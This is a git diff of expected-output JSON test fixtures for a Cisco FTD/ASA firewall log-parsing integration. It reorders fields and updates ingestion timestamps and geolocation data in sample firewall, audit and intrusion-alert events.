"cisco": { "ftd": {} - } - }, - { - "process": { - "name": "ActionQueueScrape.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T14:01:35.000Z", - "ecs": { - "version": "1.12.0" - }, - "host": { - "name": "siem-management" - }, - "event": { - "severity": 7, - "ingested": "2021-12-09T13:33:00.917366500Z", - "original": "\u003c14\u003eAug 14 2019 14:01:35 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", - "code": "" - }, - "cisco": { - "ftd": {} - } - }, - { "process": { "name": "ActionQueueScrape.pl" }, + "@timestamp": "2019-08-14T14:01:35.000Z", + "ecs": { + "version": "1.12.0" + }, "log": { "level": "debug" }, + "host": { + "name": "siem-management" + }, "syslog": { "facility": { "code": 14 } }, + "event": { + "severity": 7, + "ingested": "2021-12-14T14:37:43.991243314Z", + "original": "\u003c14\u003eAug 14 2019 14:01:35 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", + "code": "" + }, + "cisco": { + "ftd": {} + }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "ActionQueueScrape.pl" + }, "@timestamp": "2019-08-14T14:01:36.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917371800Z", + "ingested": "2021-12-14T14:37:43.991243696Z", "original": "\u003c14\u003eAug 14 2019 14:01:36 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Device Configuration for siem-ftd\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T14:01:55.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917377200Z", + "ingested": "2021-12-14T14:37:43.991244091Z", "original": "\u003c14\u003eAug 14 2019 14:01:55 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:56.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917382500Z", + "ingested": "2021-12-14T14:37:43.991244481Z", "original": "\u003c14\u003eAug 14 2019 14:01:56 sfdccsm: siem-management: admin@localhost, Task Queue, Policy Deployment to siem-ftd - SUCCESS\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:57.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917387700Z", + "ingested": "2021-12-14T14:37:43.991244860Z", "original": "\u003c14\u003eAug 14 2019 14:01:57 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T14:02:03.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917393Z", + "ingested": "2021-12-14T14:37:43.991245243Z", "original": "\u003c14\u003eAug 14 2019 14:02:03 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Syslog, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "index.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "index.cgi" + }, "@timestamp": "2019-08-14T14:02:11.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917398300Z", + "ingested": "2021-12-14T14:37:43.991245652Z", "original": "\u003c14\u003eAug 14 2019 14:02:11 index.cgi: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Audit, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T14:02:19.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917403600Z", + "ingested": "2021-12-14T14:37:43.991246040Z", "original": "\u003c14\u003eAug 14 2019 14:02:19 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T14:02:31.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917408900Z", + "ingested": "2021-12-14T14:37:43.991246428Z", "original": "\u003c14\u003eAug 14 2019 14:02:31 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T14:02:38.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917414200Z", + "ingested": "2021-12-14T14:37:43.991246824Z", "original": "\u003c14\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Local System Configuration, Save Local System Configuration\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "priority": 2, - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T14:02:38.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "priority": 2, + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917419500Z", + "ingested": "2021-12-14T14:37:43.991247204Z", "original": "\u003c14.2\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Audit Log Settings \u003e Modified: Send Audit Log to Syslog enabled \u003e Disabled", "code": "" }, @@ -1259,7 +1256,10 @@ "ftd": { "security": {} } - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-intrusion.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-intrusion.log-expected.json index d6e82f0cd2f..585ffd43c2b 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-intrusion.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-intrusion.log-expected.json @@ -15,15 +15,15 @@ "ip": "10.0.1.20" }, "message": "SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt", - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "firefox", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -64,7 +64,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:33:02.768491200Z", + "ingested": "2021-12-14T14:37:45.778530267Z", "original": "2019-08-16T09:54:00Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55644, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -129,15 +129,15 @@ "ip": "10.0.1.20" }, "message": "SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt", - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "firefox", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -178,7 +178,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:33:02.768499400Z", + "ingested": "2021-12-14T14:37:45.778533414Z", "original": "2019-08-16T09:57:02Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55868, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -243,13 +243,13 @@ "ip": "10.0.100.30" }, "message": "APP-DETECT failed FTP login attempt", - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "6", "transport": "tcp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -290,7 +290,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:33:02.768504900Z", + "ingested": "2021-12-14T14:37:45.778533878Z", "original": "2019-08-16T10:04:44Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 39114, Protocol: tcp, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -353,13 +353,13 @@ "ip": "10.0.100.30" }, "message": "APP-DETECT failed FTP login attempt", - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "6", "transport": "tcp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -400,7 +400,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:33:02.768510300Z", + "ingested": "2021-12-14T14:37:45.778534262Z", "original": "2019-08-16T10:09:47Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 40740, Protocol: 6, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-no-type-id.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-no-type-id.log-expected.json index adc27b67bf5..d11000438f6 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-no-type-id.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-no-type-id.log-expected.json @@ -17,13 +17,13 @@ "ip": "10.1.123.45" }, "message": "Intrusion attempt", - "tags": [ - "preserve_original_event" - ], "network": { "application": "webserver", "protocol": "http" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "beats", "product": "asa", @@ -48,7 +48,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:03.454300100Z", + "ingested": "2021-12-14T14:37:46.471794455Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: ApplicationProtocol: http, Client: webserver, DstIP: 10.8.12.47, SrcIP: 10.1.123.45, Message: Intrusion attempt", "code": "430001", "kind": "alert", @@ -109,7 +109,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:03.454308200Z", + "ingested": "2021-12-14T14:37:46.471797245Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2).", "code": "430001", "kind": "alert", @@ -167,7 +167,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:03.454313700Z", + "ingested": "2021-12-14T14:37:46.471797755Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2), Empty: ,FileCount:, IngressZone:", "code": "430002", "kind": "event", @@ -243,7 +243,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:33:03.454319Z", + "ingested": "2021-12-14T14:37:46.471798145Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: %ASA-3-430005 Message: This one has a type id, HTTPResponse: 404, Message: And two messages, SrcIP: 127.0.0.1, DstIP: 192.168.3.33, SrcPort: 512, DstPort: 64311", "code": "430005", "kind": "alert", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log-expected.json index f31faf15512..5de3d206fb9 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log-expected.json @@ -7,20 +7,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -73,7 +67,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:03.880922800Z", + "ingested": "2021-12-14T14:37:46.872025477Z", "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -\u003e OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", @@ -138,7 +132,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:03.880928800Z", + "ingested": "2021-12-14T14:37:46.872028339Z", "original": "Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -220,7 +214,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:03.880933800Z", + "ingested": "2021-12-14T14:37:46.872028753Z", "original": "Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware", "code": "338204", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log-expected.json index 7fda427d8c5..6ee48db1219 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log-expected.json @@ -48,7 +48,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.305642200Z", + "ingested": "2021-12-14T14:37:47.267657061Z", "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", @@ -118,7 +118,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.305651100Z", + "ingested": "2021-12-14T14:37:47.267659298Z", "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", @@ -188,7 +188,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305656700Z", + "ingested": "2021-12-14T14:37:47.267659684Z", "original": "Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -266,7 +266,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305662Z", + "ingested": "2021-12-14T14:37:47.267660023Z", "original": "Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", "code": "106100", "kind": "event", @@ -343,7 +343,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305667500Z", + "ingested": "2021-12-14T14:37:47.267660370Z", "original": "Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", "code": "106100", "kind": "event", @@ -413,7 +413,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305672900Z", + "ingested": "2021-12-14T14:37:47.267660718Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834", "code": "305011", "kind": "event", @@ -484,7 +484,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305678200Z", + "ingested": "2021-12-14T14:37:47.267661049Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", "code": "302013", "kind": "event", @@ -556,7 +556,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305683500Z", + "ingested": "2021-12-14T14:37:47.267661388Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882", "code": "305011", "kind": "event", @@ -631,7 +631,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305688800Z", + "ingested": "2021-12-14T14:37:47.267661716Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", "code": "302015", "kind": "event", @@ -703,7 +703,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305694200Z", + "ingested": "2021-12-14T14:37:47.267662058Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392", "code": "305011", "kind": "event", @@ -776,7 +776,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305699600Z", + "ingested": "2021-12-14T14:37:47.267662390Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", "code": "302013", "kind": "event", @@ -850,7 +850,7 @@ "event": { "severity": 6, "duration": 5025000000000, - "ingested": "2021-12-09T13:33:04.305705400Z", + "ingested": "2021-12-14T14:37:47.267662916Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", "code": "302016", "kind": "event", @@ -923,7 +923,7 @@ "event": { "severity": 6, "duration": 36000000000000, - "ingested": "2021-12-09T13:33:04.305710800Z", + "ingested": "2021-12-14T14:37:47.267663259Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", "code": "302016", "kind": "event", @@ -991,7 +991,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305716100Z", + "ingested": "2021-12-14T14:37:47.267663623Z", "original": "Jun 04 2011 21:59:52 FJSG2NRFW01 : %FTD-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -1058,7 +1058,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305721600Z", + "ingested": "2021-12-14T14:37:47.267663952Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879", "code": "305011", "kind": "event", @@ -1131,7 +1131,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305727Z", + "ingested": "2021-12-14T14:37:47.267664284Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", "code": "302013", "kind": "event", @@ -1195,7 +1195,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305732600Z", + "ingested": "2021-12-14T14:37:47.267664735Z", "original": "Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query", "code": "106007", "kind": "event", @@ -1261,7 +1261,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305737900Z", + "ingested": "2021-12-14T14:37:47.267665061Z", "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1331,7 +1331,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305743300Z", + "ingested": "2021-12-14T14:37:47.267665388Z", "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1401,7 +1401,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305748800Z", + "ingested": "2021-12-14T14:37:47.267665714Z", "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1471,7 +1471,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305754300Z", + "ingested": "2021-12-14T14:37:47.267666054Z", "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1541,7 +1541,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305759600Z", + "ingested": "2021-12-14T14:37:47.267666396Z", "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1611,7 +1611,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305765Z", + "ingested": "2021-12-14T14:37:47.267666738Z", "original": "Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1681,7 +1681,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305770500Z", + "ingested": "2021-12-14T14:37:47.267667171Z", "original": "Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1751,7 +1751,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305776Z", + "ingested": "2021-12-14T14:37:47.267667512Z", "original": "Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1821,7 +1821,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305781400Z", + "ingested": "2021-12-14T14:37:47.267667842Z", "original": "Apr 30 2013 09:22:48: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -\u003e dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1891,7 +1891,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305786800Z", + "ingested": "2021-12-14T14:37:47.267668175Z", "original": "Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1957,7 +1957,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305792Z", + "ingested": "2021-12-14T14:37:47.267668510Z", "original": "Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside", "code": "106006", "kind": "event", @@ -2017,7 +2017,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305797400Z", + "ingested": "2021-12-14T14:37:47.267668841Z", "original": "Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query", "code": "106007", "kind": "event", @@ 